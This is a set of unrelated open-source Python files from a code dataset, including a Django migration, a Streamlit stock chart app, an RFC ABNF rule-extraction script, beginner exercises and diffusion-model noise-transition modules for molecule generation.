{"seq_id":"26576956454","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('features', '0003_instrument'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='User',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name', models.CharField(max_length=80)),\n                ('object_type', models.CharField(blank=True, max_length=31, null=True, verbose_name=b'ObjectType', choices=[(b'PORTFOLIO', b'PORTFOLIO'), (b'USER', b'USER'), (b'INSTRUMENT', b'INSTRUMENT')])),\n            ],\n        ),\n        migrations.AlterField(\n            model_name='instrument',\n            name='object_type',\n            field=models.CharField(blank=True, max_length=31, null=True, verbose_name=b'ObjectType', choices=[(b'PORTFOLIO', b'PORTFOLIO'), (b'USER', b'USER'), (b'INSTRUMENT', b'INSTRUMENT')]),\n        ),\n        migrations.AlterField(\n            model_name='portfolio',\n            name='object_type',\n            field=models.CharField(blank=True, max_length=31, null=True, verbose_name=b'ObjectType', choices=[(b'PORTFOLIO', b'PORTFOLIO'), (b'USER', b'USER'), (b'INSTRUMENT', b'INSTRUMENT')]),\n        ),\n    ]\n","repo_name":"rajpaul/test_quiz","sub_path":"features/migrations/0004_auto_20150818_1002.py","file_name":"0004_auto_20150818_1002.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1747591876","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 27 08:52:22 2021\r\n\r\n@author: carol\r\n\"\"\"\r\n\r\nimport yfinance as yf\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\nst.write(\"\"\"\r\n# Simple Stock Price App\r\n\r\n\r\nShown are the stock closing price and volume of Google!\r\n\r\n\"\"\")\r\n\r\ntickerSymbol ='GOOGL'\r\n\r\ntickerData = yf.Ticker(tickerSymbol)\r\ntickerDf = tickerData.history(period='1d', start='2010-5-31', end='2021-1-26')\r\n\r\nst.line_chart(tickerDf.Close)\r\nst.line_chart(tickerDf.Volume)","repo_name":"LarryPrato/stockChart","sub_path":"stockChart.py","file_name":"stockChart.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1785270771","text":"import os\nimport csv\nfrom data_utils import read_rulelist, write_list_txt\nimport abnf\nimport re\nimport glob\nfrom tqdm import tqdm\nfrom abnf.grammars import rfc5234\n\n\ndef check_names_definition_simple(rulelist): \n    #\n    # Parse every rule,\n    # record every name on the left-hand side of the equals sign,\n    # and check every name on the right-hand side: if it parses as a\n    # rulename but was never defined on a left-hand side, record it as invalid.\n    \n    import abnf\n    valid_name = set()\n    invalid_name = set()\n    # abnf_rules = [\n    #     \"ALPHA\", \"BIT\", \"CHAR\", \"CR\", \"CRLF\", \"CTL\", \"DIGIT\", \"DQUOTE\", \"HEXDIG\",\n    #     \"HTAB\", \"LF\", \"OCTET\", \"SP\", \"VCHAR\", \"WSP\", \"element\", \"ALTERNATIVE\",\n    #     \"CONCATENATION\", \"OPTIONAL\", \"REPEAT\"\n    # ]\n\n\n    left_part = []\n    right_part = []\n    for rule in rulelist:\n        parts = rule.split(\"=\")\n        left_part.append(parts[0].strip())\n        right_part.append(parts[1].strip())\n        valid_name.add(parts[0].strip())\n    \n    for right in right_part:\n        if \";\" in right:\n            right = right.split(\";\")[0]\n        for name in right.split():\n            try:\n                node = abnf.parser.ABNFGrammarRule(\"rulename\").parse_all(name)\n                if name not in valid_name:\n                    invalid_name.add(name)\n            except:\n                pass\n\n\n\n\n    return valid_name, invalid_name\n\n\ndef get_undefined_names(rulelist,rule_dict): \n    data = [] # (rule,\"name1, name2, ...\")\n    \n    valid_name = set()\n    for rule in rulelist:\n        parts = rule.split(\"=\")\n        valid_name.add(parts[0].strip())\n\n    undefined_all = []\n    for rule in rulelist:\n        parts = rule.split(\"=\")\n        right = parts[1].strip()\n\n        if \";\" in right:\n            right = right.split(\";\")[0]\n        \n        undefined_names = []\n        for name in right.split():\n            try:\n                node = abnf.parser.ABNFGrammarRule(\"rulename\").parse_all(name)\n                if name not in valid_name and name not in rule_dict :\n                    undefined_names.append(name)\n                    undefined_all.append(name)\n            except:\n                pass\n        if undefined_names:\n            data.append((rule,\" \".join(undefined_names),len(undefined_names)))\n    return data, undefined_all\n\n    \n\n\n\ndef get_def_dict(folder_path):\n    result_dict = {}\n    for filename in os.listdir(folder_path):\n        if filename.endswith('.txt') and filename.startswith('rfc'):\n            rfc_num = filename[3:-4]\n            with open(os.path.join(folder_path, filename), 'r') as f:\n                file_str = f.read()\n            rules = file_str.split('\\n\\n')\n            for rule in rules:\n                rule = rule.strip()\n                if '=' in rule:\n                    rule_name = rule.split('=')[0].strip()\n                    result_dict[rule_name] = {\n                        'rule':rule,\n                        'src':rfc_num\n                    }\n    return result_dict\n\n\ndef remove_duplicate(rulelist):\n    # Initialize a dict to keep the first rule seen for each rule name\n    rule_dict = {}\n    # Initialize a list to keep the rules that get dropped\n    deleted_rules = []\n    \n    # Iterate over the rule list\n    for rule in rulelist:\n        # Extract the rule name, i.e. the part left of the equals sign\n        rule_name = rule.split('=')[0].strip()\n        \n        # If this rule name has not been seen before, store it together with its rule\n        if rule_name not in rule_dict:\n            rule_dict[rule_name] = rule\n        # Otherwise, add this rule to the list of deleted rules\n        else:\n            deleted_rules.append(rule)\n    \n    # Convert the dict values back to a list and return it\n    return list(rule_dict.values()), deleted_rules\n
\n\ndef delete_non_abnf_old(rulelist):\n    # Step 1: Record all rulenames in a set.\n    predefined_rulenames = {\"_CONSTANT\", \"OCTET\", \"BIT\", \"HEXDIG\", \"CTL\", \"HTAB\", \"LWSP\", \"CR\", \"VCHAR\", \"DIGIT\", 'WSP', 'DQUOTE', 'LF', 'SP', 'CRLF', 'CHAR', 'ALPHA',}\n    defined_names = set(rule.split(\"=\")[0].strip() for rule in rulelist) | predefined_rulenames\n    \n    # List to keep valid rules\n    valid_rules = []\n    # List to keep removed rules\n    removed_rules = []\n\n    # Step 2: Check each rule.\n    for rule in rulelist:\n        # Replace all quoted strings with _CONSTANT\n        temp_rule = re.sub(r'\"[^\"]*\"', \"_CONSTANT\", rule)\n\n        # Remove the part after the semicolon.\n        rule_no_comment = temp_rule.split(\";\", 1)[0]\n\n        # Get the part after the first equals sign.\n        parts = rule_no_comment.split(\"=\", 1)\n        part = parts[1].strip()\n\n        # Extract rulenames\n        # This regex looks for word characters that aren't inside double quotes.\n        rulenames = re.findall(r'(?:(?<=\\s)|(?<=^))(?:(?![\\w-]*\")[\\w-]+)', part)\n\n        # If any of the rulenames doesn't exist in defined_names, remove the rule.\n        # But if the part contains \"/\" or \"*\", or any rulename contains \"-\", or \"_CONSTANT\" in part, keep the rule.\n        is_undefined_rulename = all(rulename not in defined_names for rulename in rulenames)\n        contains_slash_or_star = \"/\" in part or \"*\" in part\n        contains_hyphen = any('-' in rulename for rulename in rulenames)\n        contains_constant = \"_CONSTANT\" in part\n        \n        if is_undefined_rulename and not contains_slash_or_star and not contains_hyphen and not contains_constant:\n            removed_rules.append(rule)\n        else:\n            valid_rules.append(rule)\n    return valid_rules, removed_rules\n\n\ndef get_rulename_from_node(node):\n    \"\"\"Do a breadth-first search of the tree for rulename nodes and\n    return their values.\"\"\"\n    rulenames = []\n    queue = [node]\n    while queue:\n        n, queue = queue[0], queue[1:]\n        if n.name == 'rulename':\n            rulenames.append(n.value)\n        \n        queue.extend(n.children)\n    return rulenames\n\ndef get_dependence_rulename(rule): # find every rulename on the right-hand side of a rule\n\n\n    parser = abnf.grammars.rfc5234.Rule('rule')\n    node = parser.parse_all(rule)\n    name_list = get_rulename_from_node(node)\n    return name_list\n\n\ndef get_group(node):\n    \"\"\"Do a breadth-first search of the tree for group nodes and\n    return their values.\"\"\"\n    rulenames = []\n    queue = [node]\n    while queue:\n        n, queue = queue[0], queue[1:]\n        if n.name == 'group':\n            rulenames.append(n.value)\n        \n        queue.extend(n.children)\n    return rulenames\n\ndef get_group_names(rule):\n    import re\n\n    def extract_words_from_parentheses(text):\n        # Use a regular expression to extract the content inside the parentheses\n        matches = re.findall(r'\\((.*?)\\)', text)\n        if matches:\n            words = matches[0].split() # split into words\n            return words # return the list of words\n        return []\n    \n    parser = abnf.grammars.rfc5234.Rule('rule')\n    node = parser.parse_all(rule)\n    group = get_group(node)\n    if group:\n        group_names = extract_words_from_parentheses(group[0])\n        return group_names\n    else:\n        return []\n\n\ndef delete_non_abnf(rulelist):\n    import abnf\n\n    name_list_list = []\n    defined_names = {\"OCTET\", \"BIT\", \"HEXDIG\", \"CTL\", \"HTAB\", \"LWSP\", \"CR\", \"VCHAR\", \"DIGIT\", 'WSP', 'DQUOTE', 'LF', 'SP', 'CRLF', 'CHAR', 'ALPHA',}\n    \n    # List to keep valid rules\n    valid_rules = []\n    # List to keep removed rules\n    removed_rules = []\n    \n    for rule in rulelist:\n        rule += \"\\n\"\n        rule = rule.replace(\"\\n\",\"\\r\\n\")\n\n        name_list = get_dependence_rulename(rule)\n        defined_names.add(name_list[0])\n        name_list_list.append(name_list[1:])\n    \n    for i, rule in enumerate(rulelist):\n        rulenames = name_list_list[i]\n\n        is_undefined_rulename = False\n        if rulenames: # if the right-hand side has rulenames and all of them are undefined\n            is_undefined_rulename = all(rulename not in defined_names for rulename in rulenames)\n        \n        contains_slash_or_star = \"/\" in rule or \"*\" in rule\n        contains_hyphen = any('-' in rulename for rulename in rulenames)\n        contains_constant = '\"' in rule\n\n        if is_undefined_rulename and not contains_slash_or_star and not contains_hyphen and not contains_constant:\n            removed_rules.append(rule)\n        else:\n            valid_rules.append(rule)\n    return valid_rules, removed_rules\n
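Under delete_non_abnf above, a rule is only discarded when every rulename on its right-hand side is undefined and the rule shows none of the usual ABNF signals: no alternation "/", no repetition "*", no hyphenated names, no quoted literals. Assuming the abnf package parses these inputs the way the pipeline relies on, a small classification example:

rules = [
    "greeting = DIGIT CRLF",  # kept: DIGIT and CRLF sit in the predefined core set
    "noise = somethingelse",  # dropped: one undefined name, no ABNF markers
]
kept, removed = delete_non_abnf(rules)
print(kept)     # ['greeting = DIGIT CRLF']
print(removed)  # ['noise = somethingelse']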
\n\n    \n\n\n\n\nif __name__ ==\"__main__\":\n    # Find the names that are undefined in the rulelist, look them up in the dict,\n    # and if they are in the dict, append the corresponding rule to the list\n    input_folder = 'abnf/parse_out'\n    output_folder = 'abnf/cross_def'\n\n    data = []\n\n    undefined_names = []\n    undefined_nums = []\n    rule_dict = get_def_dict(\"abnf/parse_out\") # rulename:{'rule':'aaa = bbb','src':i}\n    non_abnf_data = []\n\n\n    os.makedirs(\"abnf/cross_def\", exist_ok=True)\n\n    txt_files = glob.glob(input_folder + \"/*.txt\")\n\n    for file_path in tqdm(txt_files):\n        match = re.search(r'rfc(\\d+)\\.txt', file_path)\n        i = int(match.group(1)) if match else None\n        out_path = f'{output_folder}/rfc{i}.txt'\n\n        rulelist = read_rulelist(file_path)\n        rulelist, removed = remove_duplicate(rulelist) # remove duplicate rules\n        rulelist, non_abnf = delete_non_abnf(rulelist) \n        \n        # get undefined names\n        valid_names, invalid_names = check_names_definition_simple(rulelist) \n        \n        # search undefined names in other rfc doc\n        added_rules = []\n        for name in invalid_names:\n            if name in rule_dict:\n                rule = rule_dict[name]['rule']\n                added_rules.append(rule)\n                # record the addition for the csv report\n                data.append((i,rule,rule_dict[name]['src']))\n\n        \n        # keep record of deleted rules\n        for rule in non_abnf:\n            non_abnf_data.append((i,rule))\n\n        rulelist.extend(added_rules)\n        write_list_txt(rulelist,out_path)\n\n\n        names_and_rules, undefined_all = get_undefined_names(rulelist,rule_dict)\n\n\n        for t in names_and_rules:\n            undefined_names.append((i,t[0],t[1],t[2]))\n\n        undefined_nums.append((i,undefined_all,len(undefined_all)))\n\n\n\n    with open('csv_files/non_abnf.csv', mode='w', newline='') as file:\n        fieldnames = ['rfc_num', 'rule']\n        writer = csv.writer(file)\n        writer.writerow(fieldnames)\n        for row in non_abnf_data:\n            writer.writerow(row) \n    \n    with open('csv_files/add_cross_def.csv', mode='w', newline='') as file:\n        fieldnames = ['rfc_num', 'added_rule',\"src\"]\n        writer = csv.writer(file)\n        writer.writerow(fieldnames)\n        for row in data:\n            writer.writerow(row) \n    \n    \n    with open('csv_files/undef_name_and_rule.csv', mode='w', newline='') as file:\n        fieldnames = ['rfc_num', 'rule',\"undef_name\",\"num\"]\n        writer = csv.writer(file)\n        writer.writerow(fieldnames)\n        for row in undefined_names:\n            writer.writerow(row) \n    \n    with open('csv_files/undefined_all.csv', mode='w', newline='') as file:\n        fieldnames = ['rfc_num', 'undefined_names',\"num\"]\n        writer = csv.writer(file)\n        writer.writerow(fieldnames)\n        for row in undefined_nums:\n            writer.writerow(row) \n\n    \n\n\n\n","repo_name":"zy8848/abnf-extractor","sub_path":"cross_def.py","file_name":"cross_def.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"741432347","text":"class Vehicle:\r\n    def __init__(self):\r\n        self.vehicle_type = \"\"\r\n\r\n    def set_vehicle_type(self, vehicle_type):\r\n        self.vehicle_type = vehicle_type\r\n\r\n\r\nclass Automobile(Vehicle):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.year = \"\"\r\n        self.make = \"\"\r\n        self.model = \"\"\r\n        self.doors = \"\"\r\n        self.roof = \"\"\r\n\r\n    def set_car_details(self, year, make, model, doors, roof):\r\n        self.year = year\r\n        self.make = make\r\n        self.model = model\r\n        self.doors = doors\r\n        self.roof = roof\r\n\r\n    def display_car_details(self):\r\n        print(\"Vehicle type:\", self.vehicle_type)\r\n        print(\"Year:\", self.year)\r\n        print(\"Make:\", self.make)\r\n        print(\"Model:\", self.model)\r\n        print(\"Number of doors:\", self.doors)\r\n        print(\"Type of roof:\", self.roof)\r\n\r\n\r\ndef main():\r\n    automobile = Automobile()\r\n    vehicle_type = \"car\" \r\n\r\n    automobile.set_vehicle_type(vehicle_type)\r\n    year = input(\"Enter the year: \")\r\n    make = input(\"Enter the make: \")\r\n    model = input(\"Enter the model: \")\r\n    doors = input(\"Enter the number of doors (2 or 4): \")\r\n    roof = input(\"Enter the type of roof (solid or sun roof): \")\r\n\r\n    automobile.set_car_details(year, make, model, doors, roof)\r\n    print(\"\\nCar Details:\")\r\n    automobile.display_car_details()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"dbautista2/m03-case-study","sub_path":"m03 case study.py","file_name":"m03 case 
study.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11341794447","text":"#Given a list of numbers, output \"bingo\" if it contains the input number.\r\n\r\nx = [42, 8, 7, 1, 0, 124, 8897, 555, 3, 67, 99]\r\n\r\ndef bingo(num):\r\n if num in x:\r\n print(\"bingo\")\r\n else:\r\n print(\"try again later\")\r\n\r\nprint(\"Pick a number between 0 and 9000\")\r\nnum = int(input())\r\nbingo(num)\r\n","repo_name":"Aldrnarie/Training-Exercises","sub_path":"SoloLearn/Python For Beginners/Bingo.py","file_name":"Bingo.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8179268962","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..modules.layers import clampped_one_hot\nfrom ..utils.so3 import ApproxAngularDistribution, random_normal_so3, so3vec_to_rotation, rotation_to_so3vec\nfrom ..utils.misc import *\nfrom datasets.molecule.constants import num_fg_types\nfrom datasets.protein.constants import num_aa_types\n\nnum_total_type = num_fg_types + num_aa_types\n\nclass VarianceSchedule(nn.Module):\n\n def __init__(self, num_steps=100, s=0.01):\n super().__init__()\n T = num_steps\n t = torch.arange(0, num_steps+1, dtype=torch.float)\n f_t = torch.cos( (np.pi / 2) * ((t/T) + s) / (1 + s) ) ** 2\n alpha_bars = f_t / f_t[0]\n\n betas = 1 - (alpha_bars[1:] / alpha_bars[:-1])\n betas = torch.cat([torch.zeros([1]), betas], dim=0)\n betas = betas.clamp_max(0.999)\n\n sigmas = torch.zeros_like(betas)\n for i in range(1, betas.size(0)):\n sigmas[i] = ((1 - alpha_bars[i-1]) / (1 - alpha_bars[i])) * betas[i]\n sigmas = torch.sqrt(sigmas)\n\n self.register_buffer('betas', betas)\n self.register_buffer('alpha_bars', alpha_bars)\n self.register_buffer('alphas', 1 - betas)\n self.register_buffer('sigmas', sigmas)\n\nclass TypeMasker(nn.Module):\n def __init__(\n self, \n num_steps=100, \n mask_id=num_total_type, \n unmasked_steps=0, \n noise_schedule='uniform'\n ) -> None:\n super().__init__()\n self.noise_shedule = noise_schedule\n self.num_steps = num_steps\n self.unmasked_steps = unmasked_steps\n self.mask_id = mask_id\n self.register_buffer('_dummy', torch.empty([0, ]))\n\n\n def forward(self, x_0, t, node_mask=1, eps=None):\n\n node_mask = node_mask.bool()\n x_t, x_0_ignore = x_0.clone(), x_0.clone()\n\n if eps is not None:\n mask_prob = eps \n else:\n mask_prob = (\n (t.view(-1).float()-self.unmasked_steps).clamp(min=0.)\n / (self.num_steps-self.unmasked_steps)\n ).to(self._dummy.device)\n\n diff_mask = (\n torch.rand_like(x_t.float()) < inflate_batch_array(mask_prob, x_t.float())\n )\n\n # if true, the element will be masked\n diff_mask = torch.logical_and(diff_mask, node_mask)\n x_t[diff_mask] = self.mask_id\n x_0_ignore[torch.bitwise_not(diff_mask)] = -1\n return x_t, x_0_ignore, diff_mask, mask_prob\n \n def reveil_mask(self, x_disc, t):\n prob = (\n (t-self.num_steps) / (self.unmasked_steps-self.num_steps)\n ).clamp(max=1., min=0.)\n changes = (\n torch.rand_like(x_disc.float()) \n < inflate_batch_array(prob, x_disc)\n )\n return changes\n\n\n\nclass PositionTransition(nn.Module):\n\n def __init__(self, num_steps, var_sched_opt={}):\n super().__init__()\n self.var_sched = VarianceSchedule(num_steps, **var_sched_opt)\n\n def add_noise(self, p_0, mask_generate, t):\n \"\"\"\n Args:\n p_0: (N, L, 3).\n mask_generate: (N, L).\n t: (N,).\n \"\"\"\n 
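        # Editor's note on the schedule defined above (a sketch, not part of the original file):
        # f(t) = cos^2((pi/2) * (t/T + s) / (1 + s)), alpha_bar(t) = f(t) / f(0), and
        # beta_t = 1 - alpha_bar(t) / alpha_bar(t-1), clamped to at most 0.999.
        # A standalone sanity check:
        #     sched = VarianceSchedule(num_steps=100)
        #     assert torch.isclose(sched.alpha_bars[0], torch.tensor(1.0))  # no noise at t = 0
        #     assert sched.alpha_bars[-1] < 1e-3                            # almost pure noise at t = T
        # The code below then realizes p_t = sqrt(alpha_bar_t) * p_0 + sqrt(1 - alpha_bar_t) * eps.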
alpha_bar = self.var_sched.alpha_bars[t]\n\n c0 = torch.sqrt(alpha_bar).view(-1, 1, 1)\n c1 = torch.sqrt(1 - alpha_bar).view(-1, 1, 1)\n\n e_rand = torch.randn_like(p_0)\n p_noisy = c0*p_0 + c1*e_rand\n p_noisy = torch.where(mask_generate[..., None].expand_as(p_0), p_noisy, p_0)\n\n return p_noisy, e_rand, mask_generate\n\n def denoise(self, p_t, eps_p, mask_generate, t):\n # IMPORTANT:\n # clampping alpha is to fix the instability issue at the first step (t=T)\n # it seems like a problem with the ``improved ddpm''.\n alpha = self.var_sched.alphas[t].clamp_min(\n self.var_sched.alphas[-2]\n )\n alpha_bar = self.var_sched.alpha_bars[t]\n sigma = self.var_sched.sigmas[t].view(-1, 1, 1)\n\n c0 = ( 1.0 / torch.sqrt(alpha + 1e-8) ).view(-1, 1, 1)\n c1 = ( (1 - alpha) / torch.sqrt(1 - alpha_bar + 1e-8) ).view(-1, 1, 1)\n\n z = torch.where(\n (t > 1)[:, None, None].expand_as(p_t),\n torch.randn_like(p_t),\n torch.zeros_like(p_t),\n )\n\n p_next = c0 * (p_t - c1 * eps_p) + sigma * z\n p_next = torch.where(mask_generate[..., None].expand_as(p_t), p_next, p_t)\n return p_next\n\n\nclass RotationTransition(nn.Module):\n\n def __init__(self, num_steps, var_sched_opt={}, angular_distrib_fwd_opt={}, angular_distrib_inv_opt={}):\n super().__init__()\n self.var_sched = VarianceSchedule(num_steps, **var_sched_opt)\n\n # Forward (perturb)\n c1 = torch.sqrt(1 - self.var_sched.alpha_bars) # (T,).\n self.angular_distrib_fwd = ApproxAngularDistribution(c1.tolist(), **angular_distrib_fwd_opt)\n\n # Inverse (generate)\n sigma = self.var_sched.sigmas\n self.angular_distrib_inv = ApproxAngularDistribution(sigma.tolist(), **angular_distrib_inv_opt)\n\n self.register_buffer('_dummy', torch.empty([0, ]))\n\n def add_noise(self, v_0, mask_generate, t, consider_single=True):\n \"\"\"\n Args:\n v_0: (N, L, 3).\n mask_generate: (N, L).\n t: (N,).\n \"\"\"\n if consider_single:\n mask_single = torch.logical_not(torch.sum(v_0, dim=-1).abs() < 1e-6)\n else:\n mask_single = True\n\n mask_generate = mask_single * mask_generate\n N, L = mask_generate.size()\n alpha_bar = self.var_sched.alpha_bars[t]\n c0 = torch.sqrt(alpha_bar).view(-1, 1, 1)\n c1 = torch.sqrt(1 - alpha_bar).view(-1, 1, 1)\n\n # Noise rotation\n e_scaled = random_normal_so3(t[:, None].expand(N, L), self.angular_distrib_fwd, device=self._dummy.device) # (N, L, 3)\n e_normal = e_scaled / (c1 + 1e-8)\n E_scaled = so3vec_to_rotation(e_scaled) # (N, L, 3, 3)\n\n # Scaled true rotation\n R0_scaled = so3vec_to_rotation(c0 * v_0) # (N, L, 3, 3)\n\n R_noisy = E_scaled @ R0_scaled\n v_noisy = rotation_to_so3vec(R_noisy)\n v_noisy = torch.where(mask_generate[..., None].expand_as(v_0), v_noisy, v_0)\n\n return v_noisy, e_scaled, mask_generate\n\n def denoise(self, v_t, v_next, mask_generate, t):\n N, L = mask_generate.size()\n e = random_normal_so3(t[:, None].expand(N, L), self.angular_distrib_inv, device=self._dummy.device) # (N, L, 3)\n e = torch.where(\n (t > 1)[:, None, None].expand(N, L, 3),\n e, \n torch.zeros_like(e) # Simply denoise and don't add noise at the last step\n )\n E = so3vec_to_rotation(e)\n\n R_next = E @ so3vec_to_rotation(v_next)\n v_next = rotation_to_so3vec(R_next)\n v_next = torch.where(mask_generate[..., None].expand_as(v_next), v_next, v_t)\n\n return v_next\n\nclass PLTypeTransition(nn.Module):\n \n def __init__(\n self, \n num_steps, \n min_type_num, \n max_type_num, \n num_classes,\n var_sched_opt={'noise_schedule': 'uniform'}):\n super().__init__()\n self.num_classes = num_classes\n self.masker = TypeMasker(\n num_steps, \n 
mask_id=self.num_classes, \n            unmasked_steps=num_steps//2,\n            **var_sched_opt\n        )\n\n        self.min_type_num = min_type_num\n        self.max_type_num = max_type_num\n        self.register_buffer('_dummy', torch.empty([0, ]))\n\n\n    def sample(self, c):\n        \"\"\"\n        Args:\n            c:    (N, L, K).\n        Returns:\n            x:    (N, L).\n        \"\"\"\n        N, L, K = c.size()\n        c = self.logits2prob(c)\n        c = c.view(N*L, K) + 1e-8\n        x = torch.multinomial(c, 1).view(N, L)\n        return x\n\n\n    def add_noise(self, x_0, mask_generate, t, eps=None):\n        \"\"\"\n        Args:\n            x_0:    (N, L)\n            mask_generate:    (N, L).\n            t:    (N,).\n        Returns:\n            x_0_ignore:    Truth with mask, LongTensor, (N, L).\n            x_t:    Sample, LongTensor, (N, L).\n            type_mask:    Mask for calculating the loss, (N, L).\n        \"\"\"\n\n        x_t, x_0_ignore, type_mask, __ = self.masker(x_0, t, mask_generate, eps)\n\n        return x_0_ignore, x_t, type_mask\n\n    \n    def before_softmax(self, x):\n        assert x.dim() == 3\n        N, L, M = x.size()\n\n        mask_type = torch.zeros_like(x).bool()\n        mask_type[:,:,:self.min_type_num] = True\n        mask_type[:,:,self.max_type_num:] = True\n\n        logits_pred = torch.where(mask_type, x-1e8, x)\n\n        return logits_pred\n\n\n    def logits2prob(self, x):\n        logits_pred = self.before_softmax(x)\n        x_pred = F.softmax(logits_pred, dim=-1)\n        return x_pred\n\n\n    def denoise(self, x_t, c_0_pred, mask_generate, t, temp=1.0):\n        \"\"\"\n        Args:\n            x_t:    (N, L).\n            c_0_pred:    Normalized probability predicted by networks, (N, L, K).\n            mask_generate:    (N, L).\n            t:    (N,).\n        Returns:\n            x_t:    Sample at (t-1)-th step with newly revealed types filled in, LongTensor, (N, L).\n        \"\"\"\n\n        changes = self.masker.reveil_mask(x_disc=x_t, t=t-1)\n        unmasked = torch.logical_or((x_t!=self.masker.mask_id), (~mask_generate).bool())\n        changes = torch.bitwise_xor(changes, torch.bitwise_and(changes, unmasked))\n\n        x_logits = c_0_pred / temp\n        x_next = self.sample(x_logits)\n\n        x_t[changes] = x_next[changes]\n\n        return x_t\n
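PLTypeTransition above inherits its corruption process from TypeMasker: nothing is masked during the first unmasked_steps = num_steps // 2 steps, then the mask probability ramps linearly to 1 at t = T, matching the (t - unmasked_steps) / (num_steps - unmasked_steps) clamp in TypeMasker.forward. A quick check of the ramp (editor's sketch, plain Python):

T, unmasked = 100, 50
ramp = lambda t: min(max((t - unmasked) / (T - unmasked), 0.0), 1.0)
print([ramp(t) for t in (25, 50, 75, 100)])  # [0.0, 0.0, 0.5, 1.0]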
\n\nclass AminoacidCategoricalTransition(nn.Module):\n    \n    def __init__(self, num_steps, num_classes=20, var_sched_opt={}):\n        super().__init__()\n        self.num_classes = num_classes\n        self.var_sched = VarianceSchedule(num_steps, **var_sched_opt)\n\n    @staticmethod\n    def _sample(c):\n        \"\"\"\n        Args:\n            c:    (N, L, K).\n        Returns:\n            x:    (N, L).\n        \"\"\"\n        N, L, K = c.size()\n        c = c.view(N*L, K) + 1e-8\n        x = torch.multinomial(c, 1).view(N, L)\n        return x\n\n    def add_noise(self, x_0, mask_generate, t):\n        \"\"\"\n        Args:\n            x_0:    (N, L)\n            mask_generate:    (N, L).\n            t:    (N,).\n        Returns:\n            c_t:    Probability, (N, L, K).\n            x_t:    Sample, LongTensor, (N, L).\n        \"\"\"\n        N, L = x_0.size()\n        K = self.num_classes\n        c_0 = clampped_one_hot(x_0, num_classes=K).float() # (N, L, K).\n        alpha_bar = self.var_sched.alpha_bars[t][:, None, None] # (N, 1, 1)\n        c_noisy = (alpha_bar*c_0) + ( (1-alpha_bar)/K )\n        c_t = torch.where(mask_generate[..., None].expand(N,L,K), c_noisy, c_0)\n        x_t = self._sample(c_t)\n        return c_t, x_t\n\n    def posterior(self, x_t, x_0, t):\n        \"\"\"\n        Args:\n            x_t:    Category LongTensor (N, L) or Probability FloatTensor (N, L, K).\n            x_0:    Category LongTensor (N, L) or Probability FloatTensor (N, L, K).\n            t:    (N,).\n        Returns:\n            theta:    Posterior probability at (t-1)-th step, (N, L, K).\n        \"\"\"\n        K = self.num_classes\n\n        if x_t.dim() == 3:\n            c_t = x_t   # When x_t is probability distribution.\n        else:\n            c_t = clampped_one_hot(x_t, num_classes=K).float() # (N, L, K)\n\n        if x_0.dim() == 3:\n            c_0 = x_0   # When x_0 is probability distribution.\n        else:\n            c_0 = clampped_one_hot(x_0, num_classes=K).float() # (N, L, K)\n\n        alpha = self.var_sched.alphas[t][:, None, None] # (N, 1, 1), one-step alpha_t for the x_t factor\n        alpha_bar = self.var_sched.alpha_bars[t-1][:, None, None] # (N, 1, 1), cumulative alpha_bar_{t-1} for the x_0 factor\n\n        theta = ((alpha*c_t) + (1-alpha)/K) * ((alpha_bar*c_0) + (1-alpha_bar)/K) # (N, L, K)\n        theta = theta / (theta.sum(dim=-1, keepdim=True) + 1e-8)\n        return theta\n\n    def denoise(self, x_t, c_0_pred, mask_generate, t):\n        \"\"\"\n        Args:\n            x_t:    (N, L).\n            c_0_pred:    Normalized probability predicted by networks, (N, L, K).\n            mask_generate:    (N, L).\n            t:    (N,).\n        Returns:\n            post:    Posterior probability at (t-1)-th step, (N, L, K).\n            x_next:    Sample at (t-1)-th step, LongTensor, (N, L).\n        \"\"\"\n        c_t = clampped_one_hot(x_t, num_classes=self.num_classes).float() # (N, L, K)\n        post = self.posterior(c_t, c_0_pred, t=t) # (N, L, K)\n        post = torch.where(mask_generate[..., None].expand(post.size()), post, c_t)\n        x_next = self._sample(post)\n        return post, x_next\n","repo_name":"yanliang3612/D3FG","sub_path":"models/diffusion/transition.py","file_name":"transition.py","file_ext":"py","file_size_in_byte":12596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
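The posterior above is the standard uniform categorical-diffusion identity, q(x_{t-1} | x_t, x_0) proportional to (alpha_t * c_t + (1 - alpha_t)/K) * (alpha_bar_{t-1} * c_0 + (1 - alpha_bar_{t-1})/K), renormalized over the K classes; that is why the x_t factor reads the one-step alphas[t] while the x_0 factor reads the cumulative alpha_bars[t-1]. A tiny check that the renormalization step yields valid distributions (editor's sketch):

import torch

theta = torch.rand(2, 5, 20)  # an unnormalized (N, L, K) posterior
theta = theta / (theta.sum(dim=-1, keepdim=True) + 1e-8)
assert torch.allclose(theta.sum(dim=-1), torch.ones(2, 5), atol=1e-4)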
